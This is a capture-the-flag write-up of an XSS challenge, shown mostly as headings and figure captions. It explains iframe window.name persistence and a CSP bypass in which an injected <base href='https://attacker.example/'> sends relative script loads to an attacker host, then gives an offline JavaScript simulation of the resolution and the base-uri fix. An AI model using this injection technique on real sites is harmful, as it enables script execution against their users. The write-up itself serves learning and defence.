Wacky XSS challenge write-up

First steps

Figure 1: Challenge page basic usage
Figure 2: Main page script.js file content

Dissecting frame.html

Figure 3: Iframe requirement error
Figure 3: window.name value check

Current browsers reset window.name when a top-level browsing context is navigated to another site, so a value set on the top-level window does not survive a cross-origin navigation. Inside a nested browsing context (an iframe) the name is kept across cross-origin navigations, which is what lets a framing page hand an attacker-chosen window.name to the framed challenge page.

Figure 4: Setting window.name value
Figure 5: iframe.html with window.name properly set
Figure 6: analytics.js file contents
Figure 7: Code branch responsible for loading analytics.js
Figure 8: window.fileIntegrity assignment

The first vulnerability

Figure 9: Reflected XSS
Figure 10: Blocked by CSP

Bypassing CSP

Figure 10: CSP header
Figure 10: CSP warning

The policy has no base-uri directive, and base-uri does not fall back to default-src, so an injected <base> element is not restricted at all. A <base href="https://attacker.example/"> placed before the page's scripts changes the document base URL, and every relative script src on the page then resolves against the attacker-controlled domain; the script-src 'self' check is evaluated against the resolved URL, so it no longer helps unless the attacker's host is itself blocked. The fix is to add base-uri 'none' (no <base> allowed at all) or base-uri 'self' (only same-origin bases) to the policy.
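The following is an added example, not code from the write-up or the challenge. It models the two halves of the point above with the WHATWG URL API so it runs under Node without a browser: how a document base URL changes where relative script URLs resolve, and whether a given CSP header lets an injected base pass. The page URL, the attacker origin, the script paths and the CSP header strings are all constructed for illustration; the base-uri matcher is simplified to exact-origin comparison and does not implement full CSP host-source matching (wildcards, path prefixes).

```javascript
// Added example: <base> injection against a CSP that lacks base-uri.
// All URLs, origins and header values below are constructed for illustration.

// Parse a CSP header value into { directiveName: [tokens...] }.
// The spec ignores a directive that is repeated; the first occurrence wins.
function parseCsp(header) {
  const directives = {};
  for (const raw of header.split(';')) {
    const parts = raw.trim().split(/\s+/).filter(Boolean);
    if (parts.length === 0) continue;
    const name = parts[0].toLowerCase();
    if (!(name in directives)) directives[name] = parts.slice(1);
  }
  return directives;
}

// Would a <base href="candidateHref"> injected into a page at pageUrl take effect?
// base-uri has no fallback to default-src: absent directive means anything goes.
// Simplified matcher: 'none' blocks all, 'self' matches the page origin,
// any other token is compared to the candidate origin as an exact string.
function baseInjectionAllowed(cspHeader, pageUrl, candidateHref) {
  const baseUri = parseCsp(cspHeader)['base-uri'];
  if (!baseUri) return true;
  const pageOrigin = new URL(pageUrl).origin;
  const candidateOrigin = new URL(candidateHref, pageUrl).origin;
  for (const token of baseUri) {
    if (token === "'none'") return false;
    if (token === "'self'" && candidateOrigin === pageOrigin) return true;
    if (token === candidateOrigin) return true;
  }
  return false;
}

// Resolve each script src the way the HTML parser would: relative references
// go against the document base URL, which is the first <base href> resolved
// against the page's own URL, or the page URL itself when there is no <base>.
function resolveScriptSrcs(pageUrl, injectedBaseHref, scriptSrcs) {
  const documentBase = injectedBaseHref ? new URL(injectedBaseHref, pageUrl).href : pageUrl;
  return scriptSrcs.map(src => new URL(src, documentBase).href);
}

// Constructed scenario: a framed challenge page loading two relative scripts
// and one absolute one, with and without an injected attacker base.
const PAGE_URL = 'https://challenge.example/frame.html';
const ATTACKER_BASE = 'https://attacker.example/';
const SCRIPTS = ['script.js', '/static/analytics.js', 'https://cdn.example/lib.js'];

const WEAK_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";
const HARDENED_CSP = WEAK_CSP + "; base-uri 'self'";

// Summary the tests below assert on: only relative srcs move to the attacker host,
// and only the policy without base-uri lets the injected <base> through.
function scenario() {
  return {
    withoutBase: resolveScriptSrcs(PAGE_URL, null, SCRIPTS),
    withBase: resolveScriptSrcs(PAGE_URL, ATTACKER_BASE, SCRIPTS),
    weakAllowsAttackerBase: baseInjectionAllowed(WEAK_CSP, PAGE_URL, ATTACKER_BASE),
    hardenedAllowsAttackerBase: baseInjectionAllowed(HARDENED_CSP, PAGE_URL, ATTACKER_BASE),
    hardenedAllowsSelfBase: baseInjectionAllowed(HARDENED_CSP, PAGE_URL, '/subdir/'),
  };
}

console.log(scenario());
```

Note that the absolute CDN URL is untouched by the base: only relative references are affected, which is why the challenge's relative `analytics.js` path matters. A script-src that lists exact script URLs, or a nonce/hash based policy, would still not save a page that lets the base be rewritten, because the injected base also changes where any relative fetch of the application's own code goes.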

Figure 11: Relative file path
Figure 12: Mock Endpoint Builder
Figure 13: Flexible Redirector
Figure 14: Invalid SRI
Figure 15: Undefined fileIntegrity variable
Code snippet 1: SRI calculator
Figure 16: Calculating SRI

Out of the sandbox

Figure 16: Sandbox error message

The final payload

Code snippet 2: Exploit Javascript code
Figure 16: Success message
Code snippet: Malicious page HTML markup

Acknowledgments
